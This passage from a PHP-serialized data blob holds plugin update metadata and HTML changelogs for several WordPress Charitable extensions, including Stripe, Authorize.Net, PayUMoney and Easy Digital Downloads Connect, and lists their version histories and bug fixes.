campaigns with campaign <strong>grand</strong>children.</li>\n</ul>\n<p>1.1.2<br />\n<em>June 3, 2016</em></p>\n<ul>\n<li>When editing campaign, correctly display the featured image, instead of just showing the photo ID.</li>\n<li>Avoid a fatal error when editing pages with Ambassadors\' shortcodes encountered if you have both Divi and Yoast SEO installed.</li>\n</ul>\n<p>1.1.1<br />\n<em>May 25, 2016</em></p>\n<ul>\n<li>Added minified stylesheet.</li>\n<li>Fixes a bug that prevented the funds recipient details from being recorded when only one of the recipient types (Your Organization or Personal Causes) is enabled.</li>\n<li>Prevent the campaign form from proceeding to the next stage if no recipient type has been selected.</li>\n<li>Changed \"Length\" label to \"Length in days\" to make it clearer how the length is measured.</li>\n<li>Use the correct currency symbol in the campaign form. <strong>NOTE:</strong> This relies on changes in Charitable 1.3.7. If you are using 1.3.6 or earlier, you will not see any difference.</li>\n<li>Improved inline documentation in template files to clarify how you can override templates.</li>\n<li>Switch to using transition_post_status hook to send new campaign and campaign creator submission emails.</li>\n<li>Fixed up the default text of the <em>Campaign Creator: New Campaign</em> email</li>\n</ul>\n<p>1.1.0<br />\n<em>April 4, 2016</em></p>\n<ul>\n<li>NEW: Three new emails! Send your campaign creators a notification when they receive a donation, an email after they submit their campaign and an email a few days before their campaign ends (you can choose how many days ahead of time the email should go out). Go to <em>Charitable</em> &gt; <em>Emails</em> to enable and configure your new email options!</li>\n<li>NEW: Auto-approve campaigns when they are submitted. No more code snippets required! Just enable the feature and you\'re done.</li>\n<li>NEW: [charitable_creator_donations] shortcode, which displays a list of a campaign creator\'s received donations when they are logged in.</li>\n<li>NEW: Choose the payout method you use for campaign creators submitting personal campaigns. By default, PayPal is the only option, but stay tuned for a Stripe Connect extension that will be included in the Charitable Pro package.</li>\n<li>Makes the Category a non-required field by default, and fixes a bug that made it impossible to submit campaigns when no campaign categories have been created.</li>\n<li>Fixes a bug that prevented the new campaign email from getting sent when a campaign is submitted.</li>\n<li>Fixes a bug that stopped mo/po translations from being used correctly.</li>\n<li>Fixes a bug in the [charitable_my_campaigns] shortcode that prevented the global $post variable from being reset properly after the shortcode.</li>\n<li>Deprecated certain hooks:\n<ul>\n<li>charitable_ambassadors_admin_start -- Use Charitable_Ambassadors_Admin::get_instance() instead.</li>\n</ul>\n</li>\n</ul>\n<p>1.0.1<br />\n<em>October 13, 2015</em></p>\n<ul>\n<li>Fixes a bug that caused the user profile information not to pre-populate in the campaign form for users that had filled out their profile.</li>\n<li>Fixes a bug that caused the recipient type of the campaign to be lost when updating a campaign via the frontend submission form.</li>\n<li>Added quick link to the Ambassadors settings tab from the Plugins page.</li>\n<li>Minor documentation improvements.</li>\n</ul>\n<p>1.0.0<br />\n<em>October 2, 2015</em></p>\n<ul>\n<li>Initial release</li>\n</ul>\n\";}\";}i:5;a:11:{s:11:\"download_id\";s:3:\"938\";s:4:\"name\";s:41:\"Charitable Easy Digital Downloads Connect\";s:11:\"new_version\";s:5:\"1.3.0\";s:4:\"slug\";s:41:\"charitable-easy-digital-downloads-connect\";s:3:\"url\";s:94:\"https://www.wpcharitable.com/extensions/charitable-easy-digital-downloads-connect/?changelog=1\";s:12:\"last_updated\";s:19:\"2025-03-29 18:45:34\";s:8:\"homepage\";s:82:\"https://www.wpcharitable.com/extensions/charitable-easy-digital-downloads-connect/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"7.2\";s:10:\"charitable\";s:3:\"1.2\";}s:8:\"sections\";s:4893:\"a:2:{s:11:\"description\";s:85:\"<p>Accept donations for your Charitable campaigns using Easy Digital Downloads. </p>\n\";s:9:\"changelog\";s:4749:\"<p>1.3.0<br />\n<em>March 31, 2025</em></p>\n<ul>\n<li>Updated for Charitable Pro.</li>\n</ul>\n<p>1.2.0<br />\n<em>August 9, 2019</em></p>\n<ul>\n<li>When an EDD subscription renews, automatically create donations.</li>\n<li>Added {campaign_donations_list} email tag for displaying campaign donations in EDD purchase emails.</li>\n<li>Update donations automatically after editing an EDD payment.</li>\n<li>Log test payments automatically. Previously, test payments would only be logged if you returned true for the edd_log_test_payment_stats filter.</li>\n</ul>\n<p>1.1.4<br />\n<em>November 28, 2017</em></p>\n<ul>\n<li>Fixes fatal error when donating.</li>\n</ul>\n<p>1.1.3<br />\n<em>November 21, 2017</em></p>\n<ul>\n<li>Ensure that the donation form validates when no donation amount is set but a product is added to cart.</li>\n<li>Fixes notices &amp; errors related to Charitable 1.5.</li>\n</ul>\n<p>1.1.2<br />\n<em>September 26, 2017</em></p>\n<ul>\n<li>Improved how the gateway is shown. For every donation made through EDD, you will now see which EDD gateway was used.</li>\n<li>Flush cache when a benefactor is changed, edited or deleted, to prevent problems with object caching systems like Memcached.</li>\n<li>Fix the way the translation files are set up.</li>\n<li>Updated to take advantage of changes coming in Charitable 1.5 (due soon!).</li>\n</ul>\n<p>1.1.1<br />\n<em>April 7, 2017</em></p>\n<ul>\n<li>Correctly pass the donor\'s country to the donation record when a new donation is created from an Easy Digital Downloads payment.</li>\n</ul>\n<p>1.1.0<br />\n<em>March 15, 2017</em></p>\n<ul>\n<li>For every line item of a donation that was created from an Easy Digital Downloads payment, show where the donation came from if it was from a download purchase. Straight donations are shown regularly.</li>\n<li>Show the ID and total value of the linked payment for a donation.</li>\n<li>Added the quantity and variation of downloads purchased to the Campaign Purchases export (under Downloads &gt; Reports &gt; Export).</li>\n<li>When a donation was created from an Easy Digital Downloads order with multiple variations of the same download, only one of the variations was reflected in the donation. In other words, donations were created that were for too small an amount. That issue is now fixed.</li>\n<li>We added a re-sync tool that allows you to update a donation based on the linked payment. If you were affected by the issue above, you can use this tool to fix up any incorrect donations. This tool is disabled by default, since most people will not need it. To enable it, go to Charitable &gt; Settings &gt; Extensions.</li>\n<li>We also added a bulk action re-sync tool. It does what the regular re-sync tool does, but for multiple donations at once. Find it via Charitable &gt; Donations.</li>\n<li>Moved all EDD Connect settings to the Extensions tab (previously they were on the General tab).</li>\n</ul>\n<p>1.0.7<br />\n<em>February 15, 2017</em></p>\n<ul>\n<li>Fixes an issue that caused warnings when trying to retrieve campaign donations for a payment that doesn\'t have an associated payment.</li>\n<li>Make sure that when you change a benefactor relationship, the old relationship settings are turned off.</li>\n</ul>\n<p>1.0.6<br />\n<em>February 1, 2017</em></p>\n<ul>\n<li>If the donor provided their address details during the checkout, save this to the donation. Previously only the name and email address were stored.</li>\n<li>Completely remove the link between an EDD payment and a donation when the donation is deleted.</li>\n</ul>\n<p>1.0.5<br />\n<em>October 17, 2016</em></p>\n<ul>\n<li>Fixes an issue that prevented the donation form from loading correctly when opening it in a modal from outside a campaign page.</li>\n<li>Minor fix to the installation process.</li>\n</ul>\n<p>1.0.4<br />\n<em>October 14, 2016</em></p>\n<ul>\n<li>Fixes an issue that caused donations to be incorrectly created for campaigns that were no longer published or deleted. This release also includes an upgrade script that will remove some (unfortunately, not all) of the invalid donations created through this bug.</li>\n</ul>\n<p>1.0.3<br />\n<em>September 14, 2016</em></p>\n<ul>\n<li>Update donation form output to work correctly with changes in Charitable 1.4+.</li>\n</ul>\n<p>1.0.2<br />\n<em>August 26, 2016</em></p>\n<ul>\n<li>Remove deprecated usage of charitable()-&gt;get_currency_helper().</li>\n</ul>\n<p>1.0.1<br />\n<em>May 16, 2016</em></p>\n<ul>\n<li>Replace array_column with wp_list_pluck for compatibility with versions of PHP prior to 5.5.0.</li>\n</ul>\n<p>1.0.0<br />\n<em>November 24, 2015</em></p>\n<ul>\n<li>Public release!</li>\n</ul>\n<p>0.9.21 (beta)<br />\n<em>August 26, 2015</em></p>\n<ul>\n<li>Resolves bug encountered when using plugin with older versions of PHP.</li>\n</ul>\n\";}\";}i:6;a:11:{s:11:\"download_id\";s:3:\"941\";s:4:\"name\";s:17:\"Charitable Stripe\";s:11:\"new_version\";s:5:\"1.5.0\";s:4:\"slug\";s:17:\"charitable-stripe\";s:3:\"url\";s:70:\"https://www.wpcharitable.com/extensions/charitable-stripe/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-07-09 10:07:52\";s:8:\"homepage\";s:58:\"https://www.wpcharitable.com/extensions/charitable-stripe/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"5.6\";s:10:\"charitable\";s:5:\"1.7.0\";}s:8:\"sections\";s:13648:\"a:2:{s:11:\"description\";s:65:\"<p>Accept credit card donations on your website with Stripe.</p>\n\";s:9:\"changelog\";s:13523:\"<p>1.5.0<br />\n<em>September 20, 2022</em></p>\n<ul>\n<li>Updated to be compatible with core Charitable plugin version 1.7.0 and above. Make sure to update this addon and Charitable core.</li>\n</ul>\n<p>1.4.14<br />\n<em>October 18, 2021</em></p>\n<ul>\n<li>Improved the error message shown to donors when there is a problem with their payment details.</li>\n</ul>\n<p>1.4.13<br />\n<em>September 3, 2021</em></p>\n<ul>\n<li>Fixed an issue with the way webhooks were handled resulting in donation emails being sent before the gateway transaction ID was saved.</li>\n<li>Avoid adding the same renewal twice in the WordPress dashboard. This appears to have only been an issue on sites with frequent timeouts.</li>\n<li>Added the `setup_future_usage` argument to one-time payments processed via Stripe Checkout.</li>\n<li>Updated the bundled Stripe PHP SDK.</li>\n</ul>\n<p>1.4.12<br />\n<em>February 1, 2021</em></p>\n<ul>\n<li>Avoid a fatal error when processing a webhook event related to a failed payment invoice on a site where Recurring Donations is not installed.</li>\n<li>Fixed an issue where in some rare cases, a duplicate donation receipt was sent out when using Stripe Checkout and Stripe sent out webhook events at the exact same time.</li>\n<li>Avoid a PHP notice for webhook refund events not related to donations. This could be triggered by refunding a WooCommerce payment, for example.</li>\n</ul>\n<p>1.4.11<br />\n<em>December 8, 2020</em></p>\n<ul>\n<li>Added charitable_stripe_http_curl_client filter to allow Stripe curl requests to be made with persistent connections disabled. This is a workaround for a problem on certain servers using CentOS. More details here: <a href=\"https://github.com/stripe/stripe-php/issues/918\">https://github.com/stripe/stripe-php/issues/918</a></li>\n<li>Some themes &amp; plugins (mainly Charitas and its associated plugins) change the donation form in such a way that certain things do not function correctly. This doesn\'t stop the donation form from working but degrades the user experience. To compensate, the Charitable now provides an alternative way of adding these functions.</li>\n</ul>\n<p>1.4.10<br />\n<em>November 4, 2020</em></p>\n<ul>\n<li>Updated to use latest Stripe PHP SDK version for improved compatibility with PHP 7.4+.</li>\n</ul>\n<p>1.4.9<br />\n<em>August 28, 2020</em></p>\n<ul>\n<li>Emails: Prevent Stripe from sending its receipt unless the receipt email option is turned on in your Stripe settings.</li>\n<li>Recurring Donations: Added support for having recurring donations that automatically complete after a certain number of renewals. Requires Recurring Donations 1.2.</li>\n<li>Checkout: Automatically cancel a payment intent after three failed payment attempts to avoid repeated fraudulent card payment attempts.</li>\n</ul>\n<p>1.4.8<br />\n<em>June 29, 2020</em></p>\n<ul>\n<li>Donation Form: Fix validation error preventing donations from validating when made with Stripe Checkout.</li>\n</ul>\n<p>1.4.7<br />\n<em>June 26, 2020</em></p>\n<ul>\n<li>Donation Form: Provide clear inline feedback when card details are not completed correctly. Previously, donors would be shown errors related to the card details they provided at the top of the donation form, which could cause confusion, specifically when they were missing a valid zip code.</li>\n<li>Checkout: When a donor cancels a payment in Stripe\'s checkout but then completes it on a subsequent pass through (i.e. after changing some details or the amount), ensure that the updated checkout ID is stored instead of the old one. Previously, this would result in the donation not being marked as Paid automatically in Charitable, even though payments were successfully completed in Stripe.</li>\n<li>Refunds: Properly handle refunds for donations made through Stripe\'s checkout.</li>\n</ul>\n<p>1.4.6<br />\n<em>April 9, 2020</em></p>\n<ul>\n<li>Webhooks: The endpoint set up by Charitable automatically was missing one event, which meant that in some sites, donations were not correctly marked as Paid. This fixes the endpoint so that any donations going forward will automatically be updated when they are processed.</li>\n</ul>\n<p>1.4.5<br />\n<em>April 6, 2020</em></p>\n<ul>\n<li>Minor update to resolve problem with plugin always showing an update.</li>\n</ul>\n<p>1.4.4<br />\n<em>April 1, 2020</em></p>\n<ul>\n<li>Metadata: Prevent error when one of the Stripe metadata fields is longer than 500 characters.</li>\n</ul>\n<p>1.4.3<br />\n<em>March 7, 2020</em></p>\n<ul>\n<li>Donations: Improved user feedback when a card is declined.</li>\n<li>Donations: Fixed bugs blocking donations to campaigns with apostrophes and other unsupported characters in their titles.</li>\n<li>Stripe Checkout: Fixed bug breaking donations with Stripe Checkout if campaigns have a blank name.</li>\n<li>Stripe Checkout: Fixed bug when Stripe Connect is used and a donation is made to a campaign that is <em>not</em> linked to a connected account.</li>\n<li>Recurring Donations: Added filters for controlling the Product &amp; Plan arguments sent to Stripe. See <a href=\"https://www.wpcharitable.com/documentation/hooks-filters-in-stripe/#charitable_stripe_plan_args\">charitable_stripe_plan_args</a> and <a href=\"https://www.wpcharitable.com/documentation/hooks-filters-in-stripe/#charitable_stripe_product_args\">charitable_stripe_product_args</a>.</li>\n<li>Privacy: Added way to stop Stripe script from loading on every page. Stripe recommends loading its script sitewide to cut down on fraud, but if user privacy concerns are more important to you, you can disable the sitewide script loading by returning false to the <a href=\"https://www.wpcharitable.com/documentation/hooks-filters-in-stripe/#charitable_stripe_load_stripe_scripts_sitewide\">charitable_stripe_load_stripe_scripts_sitewide</a> script.</li>\n<li>Webhooks: Tightened the way webhooks are processed, making sure to always use a combo of a donation ID in Charitable + a Stripe payment intent id, session id or subscription id. This avoids issues where Charitable is used on multiple sites and webhooks related to donations on one site are incorrectly used by another site.</li>\n</ul>\n<p>1.4.2<br />\n<em>September 24, 2019</em></p>\n<ul>\n<li>When processing a charge.refunded webhook, check that the charge ID matches the gateway transaction ID stored for the donation. When using Stripe on multiple sites, this could otherwise result in donations being incorrectly marked as refunded.</li>\n<li>Fix donation processing error when using Stripe Connect with the application fee left empty or set to 0.</li>\n</ul>\n<p>1.4.1<br />\n<em>September 6, 2019</em></p>\n<ul>\n<li>Fixed an error when attempting to create a payment method with missing or empty address fields.</li>\n</ul>\n<p>1.4.0<br />\n<em>September 5, 2019</em></p>\n<ul>\n<li>Implemented new version of Stripe Checkout, which is SCA-ready.</li>\n<li>Implemented Stripe\'s new Payment Intents API, which is its other SCA-ready method for accepting payments.</li>\n<li>When using Payment Intents (i.e. Checkout is turned off) the credit card fields are now replaced by a Stripe card element which is looks a little different but provides an additional level of security.</li>\n<li>You can now customize the statement descriptor from the Stripe settings area.</li>\n<li>With Stripe Checkout, optionally require donors to provide their billing address.</li>\n<li>Some filters, classes &amp; class methods have been removed or deprecated. See the <a href=\"https://www.wpcharitable.com/documentation/charitable-stripe-1-4-upgrade-notes/\">upgrade notes</a> for details.</li>\n</ul>\n<p>1.3.3<br />\n<em>May 24, 2019</em></p>\n<ul>\n<li>Fixed fatal error when viewing recurring donation details.</li>\n</ul>\n<p>1.3.2<br />\n<em>May 9, 2019</em></p>\n<ul>\n<li>Added ability to remove pending Stripe process by name, instead of index. Required to deal with incompatibility with reCAPTCHA integration.</li>\n</ul>\n<p>1.3.1<br />\n<em>April 26, 2019</em></p>\n<ul>\n<li>Prevent credit card validation from running when the Donate Widget form is submitted.</li>\n</ul>\n<p>1.3.0<br />\n<em>April 9, 2019</em></p>\n<ul>\n<li><strong>NOTE:</strong> The minimum PHP version required for Charitable Stripe is now <strong>PHP 5.4+</strong>.</li>\n<li>Updated to use latest Stripe API version and latest Stripe PHP SDK. All transactions will be processed using the 2019-03-14 Stripe API version.</li>\n<li>Added the ability to refund donations directly from the dashboard.</li>\n<li>Added the ability to cancel recurring donations directly from the dashboard. This requires Charitable Recurring 1.1+ (due soon).</li>\n<li>Improved webhook management. Webhooks are created automatically now when you supply your test/live keys, and are used to handle refunds, new renewal donations, subscription changes or subscription cancellations.</li>\n<li>Prevent donations when Javascript is disabled. This is for security reasons; the alternative is to handle the raw credit card details on your server, which is actively discouraged/blocked by Stripe.</li>\n<li>Pass AppInfo to Stripe when processing charges, creating subscriptions or when making other API calls.</li>\n<li>Underlying improvements to how payments are processed, providing better compatibility with the Recurring Donations and Stripe Connect extensions.</li>\n</ul>\n<p>1.2.4<br />\n<em>February 22, 2018</em></p>\n<ul>\n<li>Added support for quarterly and semi-annual billing periods. Requires Recurring Donations 1.1+.</li>\n<li>Updated how donation plans are created to be compatible with latest Stripe API version.</li>\n<li>Show correct amount in Stripe Checkout when using a zero-decimal currency.</li>\n<li>Allow the IPN handler to correctly deal with Stripe Connect webhooks.</li>\n<li>Improved the way the Stripe Checkout integration works when there are multiple donation forms on the same page.</li>\n<li>Fixed issue that prevented the form processing spinner from disappearing in case of error in certain scenarios.</li>\n</ul>\n<p>1.2.3<br />\n<em>June 9, 2017</em></p>\n<ul>\n<li>Added proper support zero-decimal currencies. This will apply to any of the <a href=\"https://support.stripe.com/questions/which-zero-decimal-currencies-does-stripe-support\">zero-decimal currencies supported by Stripe</a>.</li>\n<li>Include the currency when creating recurring donation plans to avoid the incorrect currency from being used for a subscription after a site\'s main currency has changed.</li>\n</ul>\n<p>1.2.2<br />\n<em>May 16, 2017</em></p>\n<ul>\n<li>Include the customer\'s address, phone number and name in the metadata sent to Stripe.</li>\n<li>Improved cross-referencing with Stripe by including links to the Stripe records from the Charitable donation log.</li>\n<li>Ensure that recurring donation plans created in test mode are differentiated from plans created in live mode. This avoids a bug when you switched from test mode to live, where you could not make recurring donations to campaigns that had already received a recurring donation while in test mode.</li>\n<li>Resolved a bug that prevented payments for recurring donations from being marked as refunded after they are refunded in the Stripe dashboard.</li>\n<li>Use <a href=\"https://stripe.com/docs/connect/shared-customers\" target=\"_blank\" rel=\"noopener\">Shared Customers</a> for platforms using Stripe alongside our Connect integration.</li>\n</ul>\n<p>1.2.1<br />\n<em>March 16, 2017</em></p>\n<ul>\n<li>Fixed a bug that kept the donation form in \'processing\' mode with the spinning progress indicator after clicking out of the Checkout modal.</li>\n</ul>\n<p>1.2.0<br />\n<em>February 7, 2017</em></p>\n<ul>\n<li>Added support for <a href=\"https://www.wpcharitable.com/extensions/charitable-recurring-donations/?utm_source=extension-readme&amp;utm_medium=changelog-tab&amp;utm_campaign=recurring-donations&amp;utm_content=stripe\">Recurring Donations</a>.</li>\n</ul>\n<p>1.1.4<br />\n<em>August 11, 2016</em></p>\n<ul>\n<li>Updated for full compatibility with Charitable 1.4.</li>\n</ul>\n<p>1.1.3<br />\n<em>June 22, 2016</em></p>\n<ul>\n<li>Fixed a bug that prevented logged in users from donating in certain cases.</li>\n<li>When switching from test mode to live mode, users who had previously donated in test mode were unable to donate in live mode. This has now been fixed.</li>\n</ul>\n<p>1.1.2<br />\n<em>June 7, 2016</em></p>\n<ul>\n<li>Fixed a bug that prevented Stripe donations from working when using the modal donation form.</li>\n</ul>\n<p>1.1.1<br />\n<em>May 16, 2016</em></p>\n<ul>\n<li>Fixed bug that prevented Donation widget from working when Stripe is enabled.</li>\n<li>Fixed bug that prevented donations with other payment methods when Stripe is enabled.</li>\n</ul>\n<p>1.1.0<br />\n<em>May 10, 2016</em></p>\n<ul>\n<li>Added support for Stripe Checkout &amp; Stripe JS. To take advantage of these, make sure you upgrade to Charitable 1.3.4 (or above).</li>\n<li>Added charitable_stripe_charge_options hook to filter options passed to Stripe when making a charge.</li>\n<li>Fixed bug that prevented translations from working on the public side of the site.</li>\n</ul>\n<p>1.0.3<br />\n<em>February 1, 2016</em></p>\n<ul>\n<li>Adds support for AJAX-driven donations to be added in Charitable 1.3.</li>\n</ul>\n<p>1.0.2<br />\n<em>November 20, 2015</em></p>\n<ul>\n<li>Fixes a bug with passing the CVC parameter to the gateway.</li>\n<li>This update also prepares for the next version of Charitable (1.2.4). Please upgrade Stripe before you upgrade Charitable.</li>\n</ul>\n<p>1.0.1<br />\n<em>October 28, 2015</em></p>\n<ul>\n<li>Fixes incompatibility issue with Wp Simple Pay for Stripe (Lite &amp; Pro).</li>\n</ul>\n\";}\";}i:7;a:11:{s:11:\"download_id\";s:4:\"2046\";s:4:\"name\";s:20:\"Charitable PayUMoney\";s:11:\"new_version\";s:5:\"1.1.3\";s:4:\"slug\";s:21:\"charitable-payu-money\";s:3:\"url\";s:74:\"https://www.wpcharitable.com/extensions/charitable-payu-money/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-07-07 09:13:05\";s:8:\"homepage\";s:62:\"https://www.wpcharitable.com/extensions/charitable-payu-money/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:0:{}s:8:\"sections\";s:1034:\"a:2:{s:11:\"description\";s:115:\"<p>PayUMoney is the perfect choice for Indian non-profits that want to accept donations from local supporters.</p>\n\";s:9:\"changelog\";s:860:\"<p>1.1.3<br />\n<em>October 10, 2017</em></p>\n<ul>\n<li>Submit processing form immediately, without waiting for the window.load event.</li>\n</ul>\n<p>1.1.2<br />\n<em>September 26, 2017</em></p>\n<ul>\n<li>Fix the way the translation files are set up.</li>\n</ul>\n<p>1.1.1<br />\n<em>May 16, 2017</em></p>\n<ul>\n<li>Generate the security hash later to allow the payment arguments to be modified using the charitable_payu_redirect_args filter.</li>\n</ul>\n<p>1.1.0<br />\n<em>June 25, 2016</em></p>\n<ul>\n<li>Fixed problem with intval warping the phone number on 32-bit systems.</li>\n<li>Added support for Charitable 1.4.0, to be released soon.</li>\n</ul>\n<p>1.0.1<br />\n<em>February 5, 2016</em></p>\n<ul>\n<li>Adds support for AJAX-driven donations to be added in Charitable 1.3.</li>\n</ul>\n<p>1.0.0<br />\n<em>October 29, 2015</em></p>\n<ul>\n<li>Initial support.</li>\n</ul>\n\";}\";}i:8;a:11:{s:11:\"download_id\";s:4:\"2724\";s:4:\"name\";s:24:\"Charitable Authorize.Net\";s:11:\"new_version\";s:5:\"1.3.8\";s:4:\"slug\";s:24:\"charitable-authorize-net\";s:3:\"url\";s:77:\"https://www.wpcharitable.com/extensions/charitable-authorize-net/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-08-08 14:47:09\";s:8:\"homepage\";s:65:\"https://www.wpcharitable.com/extensions/charitable-authorize-net/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"5.6\";s:10:\"charitable\";s:6:\"1.6.30\";}s:8:\"sections\";s:7718:\"a:2:{s:11:\"description\";s:90:\"<p>Accept credit cards and ACH / eCheck donations on your website with Authorize.Net.</p>\n\";s:9:\"changelog\";s:7569:\"<p>1.3.8<br />\n<em>August 17, 2021</em></p>\n<ul>\n<li>Fixed notices and warnings generated when first saving Authorize.net settings.</li>\n<li>Updated bundled Authorize.Net SDK, resolving some issues in compatibility with PHP 8.</li>\n</ul>\n<p>1.3.7<br />\n<em>January 7, 2021</em></p>\n<ul>\n<li>Add IP addresses for donors when recording one-time donations in Authorize.Net</li>\n</ul>\n<p>1.3.6<br />\n<em>August 31, 2020</em></p>\n<ul>\n<li>Updated dependency for scripts to jquery instead of jquery-core.</li>\n</ul>\n<p>1.3.5<br />\n<em>August 19, 2020</em></p>\n<ul>\n<li>Fixed an error encountered when processing recurring donations.</li>\n<li>Make sure that the initial donation for a recurring donation made via eCheck is updated when the subscription status changes.</li>\n</ul>\n<p>1.3.4<br />\n<em>June 19, 2020</em></p>\n<ul>\n<li>Add support for limited-term recurring donation lengths (requires Recurring Donations 1.2).</li>\n<li>Fixed the way the delay is stored when an OTS Token Error response is received from Authorize.Net for recurring donations.</li>\n<li>Fixed an error preventing webhooks from being processed successfully on web servers where apache_request_headers function is not defined.</li>\n</ul>\n<p>1.3.3<br />\n<em>March 13, 2020</em></p>\n<ul>\n<li>Correctly mark donations made via eCheck as complete when they are settled in Authorize.Net. Donations were previously left marked as Pending indefinitely.</li>\n<li>Added refund &amp; cancellation support for donations made via eCheck.</li>\n<li>Recurring donations made via eCheck will not be marked as active until the payment has settled, at least 7 days later.</li>\n<li>Automatically set a short delay on recurring donations if Authorize.Net returns an OTS Token Error response. Unfortunately, adding a delay is the only known way to work around this problem, which stems from issues in the Authorize.Net processing system.</li>\n</ul>\n<p>1.3.2<br />\n<em>February 4, 2020</em></p>\n<ul>\n<li>Fixed a bug with syncing required fields while in live mode.</li>\n</ul>\n<p>1.3.1<br />\n<em>November 27, 2019</em></p>\n<ul>\n<li>Tightened security by removing the `name` attribute from all credit card &amp; bank data fields, preventing this from ever reaching your server. This eases the PCI compliance requirements for your payment processing.</li>\n<li>Prevent donations for donors who do not have Javascript enabled. Javascript is required to securely process credit card &amp; e-check payments.</li>\n<li>Don\'t mark E-check payments as Paid until they have been processed by the bank.</li>\n<li>Removed business checking as an account type option, as this is not available for web-based e-check payments.</li>\n</ul>\n<p>1.3.0<br />\n<em>November 27, 2019</em></p>\n<ul>\n<li>Added support for ACH / eCheck payments.</li>\n<li>Prevent Authorize.Net from locking up donation processing when credit card processing fails.</li>\n<li>Log the transaction error in the donation log when a payment fails.</li>\n<li>Correctly mark a donation as Failed when payment fails.</li>\n</ul>\n<p>1.2.3<br />\n<em>May 24, 2019</em></p>\n<ul>\n<li>Prevent PHP notice when webhook creation fails.</li>\n<li>Add link to troubleshooting information for webhook problems.</li>\n<li>Added ability to remove pending Authorize.Net process by name, instead of index. Required to deal with incompatibility with reCAPTCHA integration.</li>\n</ul>\n<p>1.2.2<br />\n<em>April 26, 2019</em></p>\n<ul>\n<li>Prevent credit card validation from running when the Donate Widget form is submitted.</li>\n</ul>\n<p>1.2.1<br />\n<em>April 23, 2019</em></p>\n<ul>\n<li>Pass order description and invoice when processing transactions and recurring donations.</li>\n<li>Check that Recurring Donations is installed before processing subscription-related webhooks.</li>\n</ul>\n<p>1.2.0<br />\n<em>March 7, 2019</em></p>\n<ul>\n<li>Added the ability to refund donations directly from the WordPress dashboard. Under Donation Actions, change status to \"Refunded\" and check the box to change it in the gateway.</li>\n<li>Added support for Quarterly, Annually and Semi-Annually recurring donations. This requires Charitable Recurring 1.1+, which will be released soon.</li>\n<li>Added support for admin cancellation of recurring donations. This requires Charitable Recurring 1.1+, which will be released soon.</li>\n<li>Added webhooks integration, replacing Silent Post.</li>\n<li>Removed Silent Post support &amp; usage of MD5 Hash.</li>\n<li>Removed the Public Client Key setting on site using PHP version 5.6 or above. The client key is retrieved automatically as a background process.</li>\n<li>Added separate settings for test mode API Login ID &amp; Transaction Key. Your existing settings will automatically be assigned to the correct setting (i.e. live or test) based on whether you currently have test mode enabled.</li>\n<li>Added the charitable_authorize_net_wait_before_request filter. This provides a programmatic way to avoid the E00114 Invalid OTS Token error error, which is caused by issues with Authorize.Net\'s internal processes. Return an integer to the filter with the number of seconds you want to wait before continuing to process a donation.</li>\n<li>Removed unused DB_VERSION constant from Charitable_Authorize_Net class.</li>\n</ul>\n<p>1.1.4<br />\n<em>January 2, 2019</em></p>\n<ul>\n<li>Added filter to transaction/subscription request objects to allow other extensions to modify these.</li>\n<li>Added most recent version of the Authorize.Net PHP SDK. The previous SDK has also been kept for servers running a PHP version prior to 5.6.</li>\n<li>Prevent endless spinning icon when Accept.JS returns an error.</li>\n</ul>\n<p>1.1.3<br />\n<em>March 29, 2017</em></p>\n<ul>\n<li>When someone successfully started a monthly donation subscription, the recurring donation was marked as Active but the original donation was left as Paid. We fixed this so it\'s clear that the donation was successful.</li>\n</ul>\n<p>1.1.2<br />\n<em>March 17, 2017</em></p>\n<ul>\n<li>Fixed a bug that broke recurring donations in certain circumstances. We haven\'t had any reports from people of this actually happening, so it may not have affected you, but we\'ve fixed it here in any case.</li>\n</ul>\n<p>1.1.1<br />\n<em>February 7, 2017</em></p>\n<ul>\n<li>Fixed a bug which caused donations that were declined by Authorize.Net to be marked as Paid in Charitable.</li>\n</ul>\n<p>1.1.0<br />\n<em>December 12, 2016</em></p>\n<ul>\n<li>Added support for <a href=\"https://www.wpcharitable.com/extensions/charitable-recurring-donations?utm_source=authorize-net-extension&amp;utm_medium=changelog&amp;utm_content=110&amp;utm_campaign=recurring-donations\">Charitable Recurring Donations</a>.</li>\n<li>Added support for Accept.JS, a new Javascript library provided by Authorize.Net which allows credit card payments to be made without the credit card details ever reaching your server. This provides a more secure approach to credit card processing.</li>\n<li>Added a new tool for syncing the required fields in your Charitable donation form with the fields you have set to be required in your Authorize.Net settings.</li>\n<li>Removed PHPUnit, PHPDocumenter and PHPMD libraries from the PHP 5.2 SDK.</li>\n</ul>\n<p>1.0.2<br />\n<em>August 10, 2016</em></p>\n<ul>\n<li>Provides full compatibility with Charitable 1.4.</li>\n<li>Updates the Authorize.Net PHP SDK for sites on PHP 5.5+</li>\n</ul>\n<p>1.0.1<br />\n<em>February 3, 2016</em></p>\n<ul>\n<li>Adds support for AJAX-driven donations to be added in Charitable 1.3.</li>\n<li>Improved handling of donations that fail because of incorrect card details or another reason.</li>\n</ul>\n\";}\";}i:9;a:11:{s:11:\"download_id\";s:4:\"4627\";s:4:\"name\";s:25:\"Charitable Stripe Connect\";s:11:\"new_version\";s:5:\"1.0.5\";s:4:\"slug\";s:25:\"charitable-stripe-connect\";s:3:\"url\";s:78:\"https://www.wpcharitable.com/extensions/charitable-stripe-connect/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-09-06 10:57:26\";s:8:\"homepage\";s:66:\"https://www.wpcharitable.com/extensions/charitable-stripe-connect/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:0:{}s:8:\"sections\";s:1247:\"a:2:{s:11:\"description\";s:96:\"<p>Automatically send donations to your campaign creators with Charitable & Stripe Connect.</p>\n\";s:9:\"changelog\";s:1092:\"<p>1.0.5<br />\n<em>November 25, 2017</em></p>\n<ul>\n<li>Fixed an error preventing token authorization via the Stripe API.</li>\n</ul>\n<p>1.0.4<br />\n<em>June 9, 